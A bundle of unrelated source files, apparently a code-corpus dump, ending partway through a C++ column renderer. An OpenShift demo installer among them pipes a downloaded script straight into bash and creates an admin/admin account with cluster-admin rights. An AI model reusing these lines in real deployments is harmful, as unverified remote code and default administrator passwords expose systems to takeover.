// fading out, then releases its character objects.
class PlusPuntuation extends BaseObject {
    constructor(scene, value, x, y) {
        super(scene, "PlusPuntuation", true);
        this.value = value;
        this.x = x;
        this.y = y;
        this.create();
    }

    create(forceCreation) {
        if (forceCreation == undefined)
            forceCreation = true;
        const self = this;
        // Render "+value" with the scene font at 0.4 scale.
        this.characters = this.scene.font.addString("+" + this.value, this.x, this.y, 0.4, forceCreation);
        const targets = [];
        this.characters.forEach(function (character) {
            targets.push(character.object);
        });
        // Drift 100px up while fading, then dispose of every character.
        this.scene.tweens.add({
            targets: targets,
            y: this.y - 100,
            alpha: 0,
            ease: 'linear',
            duration: 500,
            onComplete: function () {
                self.characters.forEach(function (character) {
                    character.die();
                });
            }
        });
    }
}
|
#!/bin/bash
# Deploy the sample "discovery" aggregated API server: namespace, config,
# RBAC wiring, controller, service and APIService registration.
# (Tear-down commands kept for reference.)
#kubectl delete ns wardle
#kubectl delete -f artifacts/example/auth-delegator.yaml -n kube-system
#kubectl delete -f artifacts/example/auth-reader.yaml -n kube-system
#kubectl delete -f artifacts/example/apiservice.yaml
kubectl create -f artifacts/example/ns.yaml
kubectl create configmap -n discovery kind-compositions-config-map --from-file=kind_compositions.yaml
kubectl create -f artifacts/example/sa.yaml -n discovery
kubectl create -f artifacts/example/auth-delegator.yaml -n kube-system
kubectl create -f artifacts/example/auth-reader.yaml -n kube-system
kubectl create -f artifacts/example/grant-cluster-admin.yaml
kubectl create -f artifacts/example/rc.yaml -n discovery
kubectl create -f artifacts/example/service.yaml -n discovery
kubectl create -f artifacts/example/apiservice.yaml
|
import {
BadRequestException,
ValidationError,
ValidationPipe,
} from '@nestjs/common';
import { NestFactory } from '@nestjs/core';
import { UserInputError } from 'apollo-server-express';
import { AppModule } from './app.module';
/**
 * Boots the Nest application on port 3000 with a global ValidationPipe that
 * flattens class-validator errors into a single BadRequestException message.
 */
async function bootstrap() {
  const app = await NestFactory.create(AppModule);
  app.useGlobalPipes(
    new ValidationPipe({
      transform: true,
      exceptionFactory: (errors: ValidationError[]) => {
        // `constraints` is undefined for nested validation errors (only the
        // children carry messages); guard so the exception factory itself
        // cannot throw on Object.values(undefined).
        const error_messages = errors.map((error) =>
          Object.values(error.constraints ?? {}),
        );
        return new BadRequestException(error_messages.toString());
      },
      forbidUnknownValues: false,
    }),
  );
  await app.listen(3000);
}
bootstrap();
|
<gh_stars>0
package duhuafei.function.active;
/** sigmoid激活函数
* Created by Duhuafei on 11/09/2019.
*/
public class Sigmoid {
    /**
     * Evaluates the logistic sigmoid 1 / (1 + e^-x).
     * A null input is treated as 0 (yielding 0.5).
     */
    public static double eval(Double x) {
        final double value = (x == null) ? 0.0 : x;
        return 1.0 / (1 + Math.exp(-value));
    }
}
|
#!/bin/bash
# MIT License
# Copyright (c) 2021 Tuukka Pasanen
# Copyright (c) 2020, Ilmi Solutions Oy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Description:
# Run NginX in container
#
NGINX_LOCATION="/etc/nginx"

# Copy a vhost definition from the "sites" staging directory into the live
# config directory, unless a file or symlink is already present there.
#   $1 - config subdirectory (vhosts.d, rtmp.d or stream.d)
#   $2 - vhost file name
# The previous version ignored its second argument and silently read the
# caller's loop variable `vhost` from global scope; both are now bound
# explicitly (all existing callers already pass both arguments).
function copy_nginx_site()
{
    local conf_dir="${1}"
    local vhost="${2}"
    enable_site="${NGINX_LOCATION}/${conf_dir}/sites/${vhost}"
    nginx_site="${NGINX_LOCATION}/${conf_dir}/${vhost}"
    if [ -f "${enable_site}" ] && [ ! -L "${nginx_site}" ] && [ ! -f "${nginx_site}" ]
    then
        cp "${enable_site}" "${nginx_site}"
    fi
}
# Stage every configured vhost for each NGINX config flavour.
# shellcheck disable=SC2068
for vhost in ${VHOST_SITES[@]}
do
	copy_nginx_site "vhosts.d" "${vhost}"
done
# shellcheck disable=SC2068
for vhost in ${RTMP_SITES[@]}
do
	copy_nginx_site "rtmp.d" "${vhost}"
done
# shellcheck disable=SC2068
for vhost in ${STREAM_SITES[@]}
do
	copy_nginx_site "stream.d" "${vhost}"
done
# Run UWSGI before NGINX
if [[ "${USE_UWSGI}" == "yes" ]]
then
	/usr/sbin/uwsgi -d --ini /etc/uwsgi/uwsgi.ini
fi
# Run Memcache if needed
if [[ "${USE_MEMCACHED}" == "yes" ]]
then
	/usr/sbin/memcached -u memcached -d
fi
# Run NGINX on 80 and 443
if [[ "${USE_NGINX}" == "yes" ]]
then
	/usr/sbin/nginx
fi
# Run PHP-FPM inside Docker image
if [[ "${USE_PHPFPM}" == "yes" ]]
then
	/usr/sbin/php-fpm --fpm-config /etc/php7/fpm/php-fpm.conf
fi
# Sleep forever if we are in container (keeps PID 1 alive for the daemons).
if [[ "$1" == "-d" ]]
then
	while true
	do
		sleep 1000
	done
fi
# Drop into an interactive shell instead, when requested.
if [[ "$1" == "-bash" ]]
then
	/bin/bash
fi
|
#!/bin/bash
set -e
clear
# Banner describing this single-server (master + etcd + node) install.
cat << BASH
############################################################
# "All in the box" (Master, ETCD and Node in a server) #
############################################################
BASH
# Detect the primary outbound IP by asking the routing table.
IP_DETECT=$(ip route get 8.8.8.8 | awk 'NR==1 {print $NF}')
DF=""
read -p "Please enter the FQDN of the server: " FQDN
read -p "Please enter the IP of the server (Auto Detect): $IP_DETECT" IP
if [ -z $IP ]
then IP=$IP_DETECT
fi
# Add the above information in /etc/hosts
# Remove existing entries
sed -i "/$IP/d" /etc/hosts
echo -e "$IP\t$FQDN" >> /etc/hosts
### Update the server
echo "Updating system, please wait..."
yum -y update -q -e 0
### Create the chef-local mode infrastructure
mkdir -p ~/chef-solo-example/{backup,cache,roles,cookbooks,environments}
cd ~/chef-solo-example/cookbooks
### Installing dependencies
echo "Installing prerequisite packages, please wait..."
curl -s -L https://omnitruck.chef.io/install.sh | bash
yum install -y git
### Installing cookbooks (each clone is skipped if already present)
[ -d ~/chef-solo-example/cookbooks/cookbook-openshift3 ] || git clone -q https://github.com/IshentRas/cookbook-openshift3.git
[ -d ~/chef-solo-example/cookbooks/iptables ] || git clone -q https://github.com/chef-cookbooks/iptables.git
[ -d ~/chef-solo-example/cookbooks/yum ] || git clone -q https://github.com/chef-cookbooks/yum.git
[ -d ~/chef-solo-example/cookbooks/selinux_policy ] || git clone -q https://github.com/BackSlasher/chef-selinuxpolicy.git selinux_policy
[ -d ~/chef-solo-example/cookbooks/compat_resource ] || git clone -q https://github.com/chef-cookbooks/compat_resource.git
[ -d ~/chef-solo-example/cookbooks/docker ] || git clone -q https://github.com/chef-cookbooks/docker.git
cd ~/chef-solo-example
### Create the dedicated environment for Origin deployment
# NOTE(review): this here-doc is unquoted, so the shell expands $-sequences
# inside it; the "$apr1$..." htpasswd hash below is therefore mangled unless
# those dollar signs are escaped — verify against a generated origin.json.
cat << BASH > environments/origin.json
{
"name": "origin",
"description": "",
"cookbook_versions": {
},
"json_class": "Chef::Environment",
"chef_type": "environment",
"default_attributes": {
},
"override_attributes": {
"cookbook-openshift3": {
"openshift_common_sdn_network_plugin_name": "redhat/openshift-ovs-multitenant",
"openshift_cluster_name": "console.${IP}.nip.io",
"openshift_HA": true,
"openshift_deployment_type": "origin",
"openshift_common_default_nodeSelector": "region=infra",
"deploy_containerized": true,
"deploy_example": true,
"openshift_master_htpasswd_users": [
{
"admin": "$apr1$5iDjNKyc$Cp8.GumvS3Q2jxeXYGptd."
}
],
"openshift_master_router_subdomain": "cloudapps.${IP}.nip.io",
"master_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP"
}
],
"etcd_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP"
}
],
"node_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP",
"schedulable": true,
"labels": "region=infra"
}
]
}
}
}
BASH
### Specify the configuration details for chef-solo
cat << BASH > /root/chef-solo-example/solo.rb
cookbook_path [
'/root/chef-solo-example/cookbooks',
'/root/chef-solo-example/site-cookbooks'
]
environment_path '/root/chef-solo-example/environments'
file_backup_path '/root/chef-solo-example/backup'
file_cache_path '/root/chef-solo-example/cache'
log_location STDOUT
solo true
BASH
### Create run_list
cat << BASH > /root/chef-solo-example/run_list.json
{
"run_list": [
"recipe[cookbook-openshift3::default]"
]
}
BASH
### Deploy OSE !!!!
chef-solo --environment origin -c ~/chef-solo-example/solo.rb -j ~/chef-solo-example/run_list.json --legacy
# One-time post-install: only runs when the demo project does not exist yet.
if ! $(oc get project demo --config=/etc/origin/master/admin.kubeconfig &> /dev/null)
then
# Put admin user in cluster-admin group
oc adm policy add-cluster-role-to-user cluster-admin admin
# Create a demo project
oc adm new-project demo --display-name="Origin Demo Project" --admin=admin
oc create -f /root/chef-solo-example/cookbooks/cookbook-openshift3/scripts/build_and_run.yml &> /dev/null
fi
# Enable completion of commands
. /etc/bash_completion.d/oc
cat << BASH
##### Installation DONE ######
##### ######
Your installation of Origin is completed.
An admin user has been created for you.
Username is : admin
Password is : admin
A Sample application has been deployed :-)
Access the console here : https://console.${IP}.nip.io:8443/console
You can also login via CLI : oc login -u admin
Next steps for you :
1) Read the documentation : https://docs.openshift.org/latest/welcome/index.html
##############################
########## DONE ##############
BASH
|
import { filter, each, isArray, clone } from '@antv/util';
import BBox from '../../util/bbox';
import { getLegendComponents, getAxisComponents } from '../../util/common';
/**
* 处理图表padding的逻辑:
* 注册参与padding的自定义组件
*/
var PaddingController = /** @class */ (function () {
function PaddingController(cfg) {
this.innerPaddingComponents = [];
this.outerPaddingComponents = [];
this.plot = cfg.plot;
}
PaddingController.prototype.registerPadding = function (component, type, checkIfExist) {
if (type === void 0) { type = 'outer'; }
if (checkIfExist === void 0) { checkIfExist = false; }
if (type === 'inner') {
if (checkIfExist) {
if (!this.innerPaddingComponents.find(function (c) { return c == component; })) {
this.innerPaddingComponents.push(component);
}
}
else {
this.innerPaddingComponents.push(component);
}
}
else {
if (checkIfExist) {
if (!this.outerPaddingComponents.find(function (c) { return c == component; })) {
this.outerPaddingComponents.push(component);
}
}
else {
this.outerPaddingComponents.push(component);
}
}
};
PaddingController.prototype.getPaddingComponents = function (type) {
if (type === void 0) { type = 'outer'; }
return (type === 'outer' ? this.outerPaddingComponents : this.innerPaddingComponents) || [];
};
/**
* 清除已经注册的元素
*/
PaddingController.prototype.clear = function () {
this.innerPaddingComponents = [];
// 一些组件是在view渲染完成之后渲染初始化的
// TODO: afterRender的什么时候清除
this.outerPaddingComponents = filter(this.outerPaddingComponents, function (component) { return component.afterRender; });
};
PaddingController.prototype.clearOuterComponents = function () {
each(this.outerPaddingComponents, function (component) {
if (component.afterRender) {
component.destroy();
}
});
this.outerPaddingComponents = [];
};
PaddingController.prototype.getPadding = function () {
var props = this.plot.options;
var padding = props.padding ? props.padding : this.plot.config.theme.padding;
if (padding === 'auto') {
return [0, 0, 0, 1];
}
return padding;
};
/** view层的padding计算 */
PaddingController.prototype.processAutoPadding = function () {
var padding = this._getInnerAutoPadding();
this.plot.updateConfig({
padding: padding,
});
this.plot.render();
};
PaddingController.prototype.processOuterPadding = function () {
if (!this.plot.layerBBox) {
this.plot.layerBBox = new BBox(this.plot.x, this.plot.y, this.plot.width, this.plot.height);
}
var viewMinX = this.plot.layerBBox.minX;
var viewMaxX = this.plot.layerBBox.maxX;
var viewMinY = this.plot.layerBBox.minY;
var viewMaxY = this.plot.layerBBox.maxY;
each(this.outerPaddingComponents, function (component) {
var position = component.position;
if (component.destroyed) {
return;
}
var _a = component.getBBox(), minX = _a.minX, maxX = _a.maxX, minY = _a.minY, maxY = _a.maxY;
if (maxY >= viewMinY && maxY <= viewMaxY && position === 'top') {
viewMinY = maxY;
}
if (minY >= viewMinY && minY <= viewMaxY && position === 'bottom') {
viewMaxY = minY;
}
if (maxX > viewMinX && maxX <= viewMaxX && position === 'left') {
viewMinX = maxX;
}
if (minX >= viewMinX && maxX <= viewMaxX && position === 'right') {
viewMaxX = minX;
}
});
return new BBox(viewMinX, viewMinY, viewMaxX - viewMinX, viewMaxY - viewMinY);
};
PaddingController.prototype._getInnerAutoPadding = function () {
var _a;
var props = this.plot.options;
var view = this.plot.view;
var viewRange = view.coordinateBBox;
var maxX = viewRange.maxX, maxY = viewRange.maxY, minY = viewRange.minY, minX = viewRange.minX;
var bleeding = this.plot.config.theme.bleeding;
if (isArray(bleeding)) {
each(bleeding, function (it, index) {
if (typeof bleeding[index] === 'function') {
bleeding[index] = bleeding[index](props);
}
});
}
this.bleeding = clone(bleeding);
// 参与auto padding的components: axis legend label annotation
var components_bbox = [new BBox(viewRange.minX, viewRange.minY, viewRange.width, viewRange.height)];
if (((_a = this.plot.config.coordinate) === null || _a === void 0 ? void 0 : _a.type) === 'cartesian') {
this._getCartesianAxis(view, components_bbox[0], components_bbox);
}
var box = this._mergeBBox(components_bbox);
this._getLegend(view, box, components_bbox);
box = this._mergeBBox(components_bbox);
// 参与auto padding的自定义组件
var components = this.innerPaddingComponents;
each(components, function (obj) {
var component = obj;
var bbox = component.getBBox();
components_bbox.push(bbox);
});
box = this._mergeBBox(components_bbox);
var padding = [
minY - box.minY + this.bleeding[0],
box.maxX - maxX + this.bleeding[1],
box.maxY - maxY + this.bleeding[2],
minX - box.minX + this.bleeding[3],
];
// label、annotation等
var panelPadding = this._getPanel(view);
padding[0] += panelPadding[0];
padding[1] += panelPadding[1];
padding[2] += panelPadding[2];
padding[3] += panelPadding[3];
return padding;
};
// Collects the bounding boxes of all rendered cartesian axes so they can take
// part in the auto-padding computation. Each axis bbox is re-anchored just
// outside `globalBBox` on the side the axis occupies, then pushed into `bboxes`.
PaddingController.prototype._getCartesianAxis = function (view, globalBBox, bboxes) {
var axes = getAxisComponents(view);
var isTransposed = view.getCoordinate().isTransposed;
each(axes, function (axis) {
// an axis whose group rendered no children contributes nothing — skip it
if (axis.get('group').get('children').length === 0) {
return;
}
var position = axis.get('position');
var _a = axis.getLayoutBBox(), minX = _a.minX, minY = _a.minY, width = _a.width, height = _a.height;
if (!isTransposed) {
if (position === 'left') {
bboxes.push(new BBox(globalBBox.minX - width, minY, width, height));
}
else if (position === 'bottom') {
bboxes.push(new BBox(minX, globalBBox.maxY, width, height));
}
else if (position === 'right') {
bboxes.push(new BBox(globalBBox.maxX, minY, width, height));
}
}
else {
// Transposed coordinate: the declared axis position no longer matches the
// side it is drawn on, hence the remapped anchors below.
// NOTE(review): 'bottom' anchors to the left, 'left' below and 'top' to the
// right here — presumably intentional for transposed plots; confirm against
// the axis layout logic before changing.
if (position === 'bottom') {
bboxes.push(new BBox(globalBBox.minX - width, minY, width, height));
}
else if (position === 'left') {
bboxes.push(new BBox(minX, globalBBox.maxY, width, height));
}
else if (position === 'top') {
bboxes.push(new BBox(globalBBox.maxX, minY, width, height));
}
}
});
};
/**
 * Re-anchors every legend's layout bbox just outside `globalBBox` on the
 * side named by the legend's position ("top-left" → "top", etc.) and pushes
 * the result into `bboxes` for the auto-padding merge.
 */
PaddingController.prototype._getLegend = function (view, globalBBox, bboxes) {
    var legendList = getLegendComponents(view);
    each(legendList, function (legendItem) {
        // keep only the primary side of composite positions like "top-left"
        var side = legendItem.get('position').split('-')[0];
        var layout = legendItem.getLayoutBBox();
        var w = layout.width;
        var h = layout.height;
        var placed;
        switch (side) {
            case 'top':
                placed = new BBox(layout.minX, globalBBox.minY - h, w, h);
                break;
            case 'bottom':
                placed = new BBox(layout.minX, globalBBox.maxY, w, h);
                break;
            case 'left':
                placed = new BBox(globalBBox.minX - w, layout.minY, w, h);
                break;
            default: // 'right' and anything else anchors to the right edge
                placed = new BBox(globalBBox.maxX, layout.minY, w, h);
        }
        bboxes.push(placed);
    });
};
/**
 * Measures how far geometry labels overflow the panel (coordinateBBox) on
 * each side and returns the damped overflow as [top, right, bottom, left].
 * The damping ratio extent / (extent + dist) prevents over-compensation:
 * once padding is applied the panel shrinks, so the raw overflow would be
 * too large.
 */
PaddingController.prototype._getPanel = function (view) {
    // collect the label containers of every geometry — labels may spill
    // outside the panel and therefore contribute to the auto padding
    var groups = [];
    each(view.geometries, function (geom) {
        if (geom.labelsContainer) {
            groups.push(geom.labelsContainer);
        }
    });
    var minX = Infinity;
    var maxX = -Infinity;
    var minY = Infinity;
    var maxY = -Infinity;
    each(groups, function (group) {
        var children = group.get('children');
        children.forEach(function (child) {
            // empty sub-groups have a meaningless bbox — skip them
            if (child.type === 'group' && child.get('children').length === 0) {
                return;
            }
            var bbox = child.getBBox();
            minX = Math.min(minX, bbox.minX);
            maxX = Math.max(maxX, bbox.maxX);
            minY = Math.min(minY, bbox.minY);
            maxY = Math.max(maxY, bbox.maxY);
        });
    });
    var panelRange = view.coordinateBBox;
    // Damp a raw per-side overflow. Non-positive overflow (including the
    // -Infinity produced when no labels exist) maps to 0, matching the old
    // Math.max(dist, 0) behavior. The redundant parseFloat() calls on the
    // numeric bbox coordinates were removed — they were no-ops.
    var damp = function (dist, extent) {
        return dist > 0 ? dist * (extent / (extent + dist)) : 0;
    };
    var rightDist = damp(maxX - panelRange.maxX, panelRange.width);
    var leftDist = damp(panelRange.minX - minX, panelRange.width);
    var topDist = damp(panelRange.minY - minY, panelRange.height);
    var bottomDist = damp(maxY - panelRange.maxY, panelRange.height);
    return [topDist, rightDist, bottomDist, leftDist];
};
/**
 * Returns the union of all supplied bounding boxes as a plain
 * { minX, maxX, minY, maxY } record.
 */
PaddingController.prototype._mergeBBox = function (bboxes) {
    var merged = { minX: Infinity, maxX: -Infinity, minY: Infinity, maxY: -Infinity };
    each(bboxes, function (item) {
        merged.minX = Math.min(merged.minX, item.minX);
        merged.maxX = Math.max(merged.maxX, item.maxX);
        merged.minY = Math.min(merged.minY, item.minY);
        merged.maxY = Math.max(merged.maxY, item.maxY);
    });
    return merged;
};
return PaddingController;
}());
export default PaddingController;
//# sourceMappingURL=padding.js.map
|
# Numeric values for Roman numeral symbols (single- and two-character forms;
# the converter below only looks up single characters).
ROMAN_NUMERALS = {'I': 1,'IV': 4,'V': 5,'IX': 9,'X': 10,'XL': 40,'L': 50,'XC': 90,'C': 100,'CD': 400,'D': 500,'CM': 900,'M': 1000}

def convertRomanToNumber(numeral):
    """Convert a Roman numeral string to its integer value.

    Uses the subtractive rule: when a symbol is followed by a strictly
    larger one (e.g. 'IX'), the pair contributes next - current.
    """
    total = 0
    pos = 0
    while pos < len(numeral):
        current = ROMAN_NUMERALS[numeral[pos]]
        nxt = ROMAN_NUMERALS[numeral[pos + 1]] if pos + 1 < len(numeral) else 0
        if nxt > current:
            # subtractive pair such as IV, IX, XL, ...
            total += nxt - current
            pos += 2
        else:
            total += current
            pos += 1
    return total
# Main entry point: print the numeric value of a Roman numeral.
def romanToInt(numeral):
    """Print the integer value of ``numeral``.

    The previous special-casing of "I" and "II" was redundant —
    convertRomanToNumber already handles them — so the function now
    delegates unconditionally. Output is unchanged.
    """
    print(convertRomanToNumber(numeral))

# Demo: convert a few numerals from I to MMXXVII
romanToInt("I")
romanToInt("II")
romanToInt("MMXXVII")
|
import React from 'react'
import styled from '@emotion/styled/macro'
import mq from 'mediaQuery'
import { hasNonAscii } from '../../utils/utils'
// Page-level <main> wrapper: full width with an asymmetric right gutter on
// desktop, collapsing to even 25px side padding below 768px.
const MainContainer = styled('main')`
width: 100%;
padding: 20px 100px 0px 30px;
@media (max-width: 768px) {
padding: 50px 25px 0px 25px;
}
`
// Layout wrapper around routed page content.
// NOTE(review): hasNonAscii() is forwarded to MainContainer but the styles
// above never interpolate it — presumably a styling hook used elsewhere;
// confirm before removing (styled-components would forward it to the DOM).
const Main = ({ children }) => (
<MainContainer hasNonAscii={hasNonAscii()}>{children}</MainContainer>
)
export default Main
|
import 'jquery'
import 'materialize-css'
import '../node_modules/materialize-css/dist/css/materialize.css'
import Map from './map'
import './styles/styles.css'
// Enable webpack hot-module replacement during development.
if (module.hot) {
module.hot.accept();
}
// Application entry point: wire the map and the navbar controls together.
const map = new Map()
const inputRefCat = document.getElementById('navRefCatForm')
const toolMeasure = document.getElementById('tool-measure')
const toolLocate = document.getElementById('tool-locate')
// Look up the cadastral reference typed by the user and load its parcel.
const refCatSearch = () => {
var refcat = document.getElementById('txt-refcat').value
map.descargaParcela(refcat)
}
/* Prevent Enter from refreshing the page and trigger the search instead */
inputRefCat.addEventListener('keypress', (e) => {
// NOTE(review): e.which is deprecated; 13 is the Enter key code
if (e.which == 13) {
e.preventDefault()
refCatSearch()
}
})
// Toggle the measuring tool with the checkbox state.
toolMeasure.addEventListener('click', (e) => {
if (e.target.checked){
map.activaMedidor()
} else {
map.desactivaMedidor()
}
})
// Center the map on the user's geolocation.
toolLocate.addEventListener('change', (e) => {
map.activaLocation()
})
// Materialize side navigation drawer.
$(".button-collapse").sideNav({
menuWidth: 250
})
// Materialize date picker, localized to Spanish; picking a date loads the
// historic cadastre layer for that day.
$('.datepicker').pickadate({
labelMonthNext: 'Mes siguiente',
labelMonthPrev: 'Mes anterior',
labelMonthSelect: 'Selecciona un mes',
labelYearSelect: 'Selecciona un año',
monthsFull: [ 'Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre' ],
monthsShort: [ 'Ene', 'Feb', 'Mar', 'Abr', 'May', 'Jun', 'Jul', 'Ago', 'Sep', 'Oct', 'Nov', 'Dic' ],
weekdaysFull: [ 'Domingo', 'Lunes', 'Martes', 'Miércoles', 'Jueves', 'Viernes', 'Sábado' ],
weekdaysShort: [ 'Dom', 'Lun', 'Mar', 'Mie', 'Jue', 'Vie', 'Sab' ],
weekdaysLetter: [ 'D', 'L', 'M', 'X', 'J', 'V', 'S' ],
today: 'Hoy',
clear: 'Limpiar',
close: 'Cerrar',
format: 'dd/mm/yyyy',
selectMonths: true,
selectYears: 15,
container: document.body,
onSet: function(e) {
/* Check whether pickadate is setting an actual date or a clear action */
if (e.hasOwnProperty("select") || e.hasOwnProperty("clear")){
var dateString = this.get('select', 'yyyy-mm-dd')
map.catastroHistorico(dateString)
this.close()
}
}
})
$('.modal').modal();
|
# Decrypt Ops Manager installation exports into ./decrypted using eos.rb.
# Usage: <script> <ops-manager-passphrase>
OPS_MGR_PASSWD="$1"
mkdir -p decrypted 2>/dev/null
# Abort instead of decrypting into the wrong directory if cd fails.
cd decrypted || exit 1
# Passphrase is quoted so spaces/globs in it survive word splitting.
ruby ../eos.rb decrypt "$OPS_MGR_PASSWD" ../installation.yml decrypted-installation.yml
ruby ../eos.rb decrypt "$OPS_MGR_PASSWD" ../actual-installation.yml decrypted-actual-installation.yml
cd ..
|
<filename>setup_test.go<gh_stars>10-100
package restic
import (
"testing"
"github.com/caddyserver/caddy"
"github.com/caddyserver/caddy/caddyhttp/httpserver"
)
// TestSetup verifies that a minimal `restic /basepath` directive installs a
// ResticHandler in the middleware chain with BasePath and Next set correctly.
func TestSetup(t *testing.T) {
c := caddy.NewTestController("http", `restic /basepath`)
err := setup(c)
if err != nil {
t.Fatalf("Expected no errors, got: %v", err)
}
// setup must have registered exactly our middleware on the controller
mids := httpserver.GetConfig(c).Middleware()
if len(mids) == 0 {
t.Fatal("Expected middleware, had 0 instead")
}
handler := mids[0](httpserver.EmptyNext)
myHandler, ok := handler.(ResticHandler)
if !ok {
t.Fatalf("Expected handler to be type ResticHandler, got: %#v", handler)
}
if myHandler.BasePath != "/basepath" {
t.Error("Expected base path to be /basepath")
}
// the chained Next handler must be the one we passed in above
if !httpserver.SameNext(myHandler.Next, httpserver.EmptyNext) {
t.Error("'Next' field of handler was not set properly")
}
}
// TestExtParse is a table-driven test of directive parsing: no argument
// defaults the base path to "/", one argument sets it, a second argument is
// tolerated (ignored for BasePath), and a third argument is an error.
func TestExtParse(t *testing.T) {
tests := []struct {
inputStr string
shouldErr bool
expectedBasePath string
}{
{`restic`, false, "/"},
{`restic /basepath`, false, "/basepath"},
{`restic /basepath /backups`, false, "/basepath"},
{`restic /basepath /backups extra`, true, "/basepath"},
}
for i, test := range tests {
c := caddy.NewTestController("http", test.inputStr)
err := setup(c)
if err == nil && test.shouldErr {
t.Errorf("Test %d didn't error, but it should have", i)
} else if err != nil && !test.shouldErr {
t.Errorf("Test %d errored, but it shouldn't have; got '%v'", i, err)
}
// error cases register no handler — nothing further to check
if test.shouldErr {
continue
}
mids := httpserver.GetConfig(c).Middleware()
if len(mids) == 0 {
t.Fatalf("Test %d: Expected middleware, had 0 instead", i)
}
handler := mids[0](httpserver.EmptyNext)
myHandler, ok := handler.(ResticHandler)
if !ok {
t.Fatalf("Expected handler to be type ResticHandler, got: %#v", handler)
}
if test.expectedBasePath != myHandler.BasePath {
t.Errorf("Test %d: Expected base path to be %s but was %s", i, test.expectedBasePath, myHandler.BasePath)
}
}
}
|
const Sequelize = require('sequelize')
const sequelize = require('../database')
// Sequelize model for a Brawlhalla player profile, keyed by the game's own
// player id (no auto-increment). Indexed on `rank` for leaderboard queries.
const Player = sequelize.define(
'player',
{
// primary key comes from the Brawlhalla API, not generated locally
brawlhalla_id: {
type: Sequelize.INTEGER.UNSIGNED,
primaryKey: true,
},
name: Sequelize.STRING,
xp: Sequelize.INTEGER.UNSIGNED,
level: Sequelize.INTEGER.UNSIGNED,
rank: Sequelize.INTEGER.UNSIGNED,
tier: Sequelize.STRING,
games: Sequelize.INTEGER.UNSIGNED,
wins: Sequelize.INTEGER.UNSIGNED,
rating: Sequelize.INTEGER.UNSIGNED,
// NOTE(review): peak_rating/ranked_* use narrower column types than the
// plain INTEGER fields above — presumably a storage optimization; confirm
// the ranges before widening for consistency.
peak_rating: Sequelize.SMALLINT.UNSIGNED,
ranked_games: Sequelize.MEDIUMINT.UNSIGNED,
ranked_wins: Sequelize.MEDIUMINT.UNSIGNED,
region: Sequelize.STRING,
// ids of the player's three most played legends
legend1: Sequelize.INTEGER.UNSIGNED,
legend2: Sequelize.INTEGER.UNSIGNED,
legend3: Sequelize.INTEGER.UNSIGNED,
// unix timestamp of the last profile refresh
lastupdated: Sequelize.INTEGER.UNSIGNED,
},
{
indexes: [
{
fields: ['rank'],
},
],
}
)
module.exports = Player
|
<filename>Renderer.cpp<gh_stars>1-10
//
// Renderer.cpp
// walls3d
//
// Created by <NAME> on 5/12/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
#include <string.h>
#include "Renderer.hpp"
#include "GeomUtils.hpp"
#include "Utils.hpp"
constexpr uint8_t Renderer::ditherPattern8bit[];
// Constructs a renderer that draws 1-bit, page-packed columns into the
// caller-owned pPixelBuf (not owned or freed here).
// colRenderedCb is invoked after each column is rendered — presumably so the
// caller can flush/advance the buffer; confirm with call sites.
// camera is stored as a reference and must outlive this Renderer.
Renderer::Renderer(uint8_t* pPixelBuf,
uint8_t screenWidth,
uint8_t screenHeight,
ColRenderedCbType colRenderedCb,
const Camera& camera):
pPixelBuf{pPixelBuf},
screenWidth{screenWidth},
screenHeight{screenHeight},
colRenderedCb{colRenderedCb},
camera{camera}
{
}
// Hook called before a frame is rendered; intentionally empty in the base
// renderer (subclasses/platform backends may override or extend).
void Renderer::BeginRender()
{
}
// Hook called after a frame is rendered; intentionally empty here.
void Renderer::EndRender()
{
}
// Projects a wall column's on-screen height from its perpendicular distance:
// closer walls yield taller columns (simple 1/d perspective).
// NOTE(review): assumes dist > 0 — zero would divide by zero; confirm callers
// clip geometry before projecting.
double Renderer::GetColumnHeightByDistance(double dist)
{
    // World-to-screen scale factor. Was the magic literal 30.0f — a float
    // literal in an otherwise double expression; 30.0 is bit-identical.
    constexpr double kHeightScale = 30.0;
    return kHeightScale / dist * static_cast<double>(screenHeight);
}
// Renders one vertical wall column of the given height, vertically centered,
// as 1-bit pixels packed into 8-row "pages", with a height-dependent dither
// pattern applied. Calls colRenderedCb() when the column is complete.
// NOTE(review): screenX is currently unused and pixelBufferOffset always
// starts at 0 — presumably pPixelBuf is a per-column buffer that the
// colRenderedCb callback flushes; confirm with call sites.
// NOTE(review): the static ditherPatternOffset makes this function stateful
// and non-reentrant.
void Renderer::RenderColumn(uint32_t screenX, uint8_t height)
{
// column spans [y1, y2), centered on the middle of the screen
double y1Float {static_cast<double>(screenHeight / 2) - (height / 2)};
uint8_t y1 {static_cast<uint8_t>(Rast(y1Float))};
uint8_t y2 {static_cast<uint8_t>(Rast(y1Float + height))};
// figure out where in the pixel buffer to start, and only do
// additions from there (avoid multiplication in the drawing loop)
size_t pixelBufferOffset = 0;
// draw a vertical line all the way through the column
// pick a dither pattern by how much of the screen the column fills (0..7)
uint8_t ditherPatternIndex = (8 * height / screenHeight);
if (ditherPatternIndex > 7) ditherPatternIndex = 7;
static uint8_t ditherPatternOffset = 0;
// duplicate the 8-bit pattern so it can be rotated by an arbitrary shift
uint16_t ditherPattern8 = ditherPattern8bit[ditherPatternIndex];
